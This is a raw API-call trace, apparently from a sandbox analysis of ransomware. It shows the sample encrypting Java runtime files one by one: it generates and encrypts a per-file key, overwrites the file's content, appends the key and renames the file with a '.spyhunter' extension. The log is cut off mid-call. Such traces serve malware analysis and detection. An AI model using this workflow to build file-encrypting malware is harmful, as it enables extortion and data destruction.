[0125.590] GetProcessHeap () returned 0x2c0000 [0125.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.590] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy.spyhunter") returned 73 [0125.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy.spyhunter")) returned 1 [0125.590] GetProcessHeap () returned 0x2c0000 [0125.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.590] GetProcessHeap () returned 0x2c0000 [0125.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.591] GetProcessHeap () returned 0x2c0000 [0125.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfa10 | out: hHeap=0x2c0000) returned 1 [0125.591] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7c0 | out: pbBuffer=0x57f7c0) returned 1 [0125.591] GetProcessHeap () returned 0x2c0000 [0125.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.591] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7b8*=0x30) returned 1 [0125.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0125.625] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek") returned 59 [0125.625] StrStrW (lpFirst="Windhoek", lpSrch=".txt") returned 0x0 [0125.625] GetProcessHeap () returned 0x2c0000 [0125.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0125.625] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f77c*=0x338, lpOverlapped=0x0) returned 1 [0126.898] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffcc8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.898] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x338, lpNumberOfBytesWritten=0x57f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f77c*=0x338, lpOverlapped=0x0) returned 1 [0126.898] GetProcessHeap () returned 0x2c0000 [0126.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0126.898] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.898] WriteFile (in: hFile=0x17c, lpBuffer=0x57f7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f77c, lpOverlapped=0x0 | out: lpBuffer=0x57f7bc*, lpNumberOfBytesWritten=0x57f77c*=0x4, lpOverlapped=0x0) returned 1 [0126.898] WriteFile (in: hFile=0x17c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f77c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f77c*=0x30, lpOverlapped=0x0) returned 1 [0126.898] CloseHandle (hObject=0x17c) returned 1 [0126.898] GetProcessHeap () returned 0x2c0000 [0126.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.898] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek.spyhunter") returned 69 [0126.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek.spyhunter")) returned 1 [0126.899] GetProcessHeap () returned 0x2c0000 [0126.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.899] GetProcessHeap () returned 0x2c0000 [0126.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0126.900] GetProcessHeap () returned 0x2c0000 [0126.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb94c0 | out: hHeap=0x2c0000) returned 1 [0126.900] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7b8 | out: pbBuffer=0x57f7b8) returned 1 [0126.900] GetProcessHeap () returned 0x2c0000 [0126.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0126.900] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7b0*=0x30) returned 1 [0126.900] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0126.901] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar") returned 61 [0126.901] StrStrW (lpFirst="management-agent.jar", lpSrch=".txt") returned 0x0 [0126.901] GetProcessHeap () returned 0x2c0000 [0126.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0126.901] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f774, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f774*=0x181, lpOverlapped=0x0) returned 1 [0126.902] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffe7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.902] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x181, lpNumberOfBytesWritten=0x57f774, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f774*=0x181, lpOverlapped=0x0) returned 1 [0126.903] GetProcessHeap () returned 0x2c0000 [0126.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0126.903] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.903] WriteFile (in: hFile=0x17c, lpBuffer=0x57f7b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f774, lpOverlapped=0x0 | out: lpBuffer=0x57f7b4*, lpNumberOfBytesWritten=0x57f774*=0x4, lpOverlapped=0x0) returned 1 [0126.903] WriteFile (in: hFile=0x17c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f774, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f774*=0x30, lpOverlapped=0x0) returned 1 [0126.903] CloseHandle (hObject=0x17c) returned 1 [0126.903] GetProcessHeap () returned 0x2c0000 [0126.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.903] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.spyhunter") returned 71 [0126.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar.spyhunter")) returned 1 [0126.904] GetProcessHeap () returned 0x2c0000 [0126.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.904] GetProcessHeap () returned 0x2c0000 [0126.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0126.904] GetProcessHeap () returned 0x2c0000 [0126.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfec0 | out: hHeap=0x2c0000) returned 1 [0126.906] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7b0 | out: pbBuffer=0x57f7b0) returned 1 [0126.907] GetProcessHeap () returned 0x2c0000 [0126.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0126.907] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7a8*=0x30) returned 1 [0126.907] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0126.907] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template") returned 69 [0126.907] StrStrW (lpFirst="snmp.acl.template", lpSrch=".txt") returned 0x0 [0126.907] GetProcessHeap () returned 0x2c0000 [0126.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0126.907] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f76c*=0xd30, lpOverlapped=0x0) returned 1 [0127.029] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff2d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.030] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x57f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f76c*=0xd30, lpOverlapped=0x0) returned 1 [0127.030] GetProcessHeap () returned 0x2c0000 [0127.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0127.030] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.030] WriteFile (in: hFile=0x17c, lpBuffer=0x57f7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f76c, lpOverlapped=0x0 | out: lpBuffer=0x57f7ac*, lpNumberOfBytesWritten=0x57f76c*=0x4, lpOverlapped=0x0) returned 1 [0127.030] WriteFile (in: hFile=0x17c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f76c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f76c*=0x30, lpOverlapped=0x0) returned 1 [0127.030] CloseHandle (hObject=0x17c) returned 1 [0127.030] GetProcessHeap () returned 0x2c0000 [0127.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.030] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template.spyhunter") returned 79 [0127.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template.spyhunter")) returned 1 [0127.031] GetProcessHeap () returned 0x2c0000 [0127.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.031] GetProcessHeap () returned 0x2c0000 [0127.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.031] GetProcessHeap () returned 0x2c0000 [0127.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d110 | out: hHeap=0x2c0000) returned 1 [0127.031] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7b0 | out: pbBuffer=0x57f7b0) returned 1 [0127.033] GetProcessHeap () returned 0x2c0000 [0127.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.033] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7a8*=0x30) returned 1 [0127.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.035] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 73 [0127.035] StrStrW (lpFirst="LucidaBrightDemiItalic.ttf", lpSrch=".txt") returned 0x0 [0127.035] GetProcessHeap () returned 0x2c0000 [0127.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0127.035] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f76c*=0x2800, lpOverlapped=0x0) returned 1 [0127.158] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.159] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f76c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f76c*=0x2800, lpOverlapped=0x0) returned 1 [0127.159] GetProcessHeap () returned 0x2c0000 [0127.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0127.159] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.159] WriteFile (in: hFile=0x17c, lpBuffer=0x57f7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f76c, lpOverlapped=0x0 | out: lpBuffer=0x57f7ac*, lpNumberOfBytesWritten=0x57f76c*=0x4, lpOverlapped=0x0) returned 1 [0127.417] WriteFile (in: hFile=0x17c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f76c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f76c*=0x30, lpOverlapped=0x0) returned 1 [0127.417] CloseHandle (hObject=0x17c) returned 1 [0127.417] GetProcessHeap () returned 0x2c0000 [0127.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f067d8 [0127.417] wnsprintfW (in: pszDest=0x2f067d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf.spyhunter") returned 83 [0127.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiItalic.ttf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemiitalic.ttf.spyhunter")) returned 1 [0127.419] GetProcessHeap () returned 0x2c0000 [0127.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f067d8 | out: hHeap=0x2c0000) returned 1 [0127.419] GetProcessHeap () returned 0x2c0000 [0127.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.420] GetProcessHeap () returned 0x2c0000 [0127.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4b70 | out: hHeap=0x2c0000) returned 1 [0127.420] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7a8 | out: pbBuffer=0x57f7a8) returned 1 [0127.420] GetProcessHeap () returned 0x2c0000 [0127.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.420] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7a0*=0x30) returned 1 [0127.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.448] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida") returned 58 [0127.448] StrStrW (lpFirst="Merida", lpSrch=".txt") returned 0x0 [0127.448] GetProcessHeap () returned 0x2c0000 [0127.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.449] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f764, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f764*=0x314, lpOverlapped=0x0) returned 1 [0127.466] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffcec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.466] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x57f764, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f764*=0x314, lpOverlapped=0x0) returned 1 [0127.466] GetProcessHeap () returned 0x2c0000 [0127.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.466] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.467] WriteFile (in: hFile=0xec, lpBuffer=0x57f7a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f764, lpOverlapped=0x0 | out: lpBuffer=0x57f7a4*, lpNumberOfBytesWritten=0x57f764*=0x4, lpOverlapped=0x0) returned 1 [0127.467] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f764, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f764*=0x30, lpOverlapped=0x0) returned 1 [0127.467] CloseHandle (hObject=0xec) returned 1 [0127.467] GetProcessHeap () returned 0x2c0000 [0127.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.467] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida.spyhunter") returned 68 [0127.467] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida.spyhunter")) returned 1 [0127.468] GetProcessHeap () returned 0x2c0000 [0127.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.468] GetProcessHeap () returned 0x2c0000 [0127.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.468] GetProcessHeap () returned 0x2c0000 [0127.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9040 | out: hHeap=0x2c0000) returned 1 [0127.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7a8 | out: pbBuffer=0x57f7a8) returned 1 [0127.468] GetProcessHeap () returned 0x2c0000 [0127.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.469] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7a0*=0x30) returned 1 [0127.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.470] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse") returned 62 [0127.470] StrStrW (lpFirst="Whitehorse", lpSrch=".txt") returned 0x0 [0127.470] GetProcessHeap () returned 0x2c0000 [0127.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.470] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f764, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f764*=0x454, lpOverlapped=0x0) returned 1 [0127.488] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffbac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.488] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x454, lpNumberOfBytesWritten=0x57f764, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f764*=0x454, lpOverlapped=0x0) returned 1 [0127.488] GetProcessHeap () returned 0x2c0000 [0127.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.489] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.489] WriteFile (in: hFile=0xec, lpBuffer=0x57f7a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f764, lpOverlapped=0x0 | out: lpBuffer=0x57f7a4*, lpNumberOfBytesWritten=0x57f764*=0x4, lpOverlapped=0x0) returned 1 [0127.489] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f764, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f764*=0x30, lpOverlapped=0x0) returned 1 [0127.489] CloseHandle (hObject=0xec) returned 1 [0127.489] GetProcessHeap () returned 0x2c0000 [0127.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.489] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse.spyhunter") returned 72 [0127.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse.spyhunter")) returned 1 [0127.490] GetProcessHeap () returned 0x2c0000 [0127.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.490] GetProcessHeap () returned 0x2c0000 [0127.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0127.490] GetProcessHeap () returned 0x2c0000 [0127.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba750 | out: hHeap=0x2c0000) returned 1 [0127.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7a0 | out: pbBuffer=0x57f7a0) returned 1 [0127.490] GetProcessHeap () returned 0x2c0000 [0127.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0127.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f798*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f798*=0x30) returned 1 [0127.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana"), 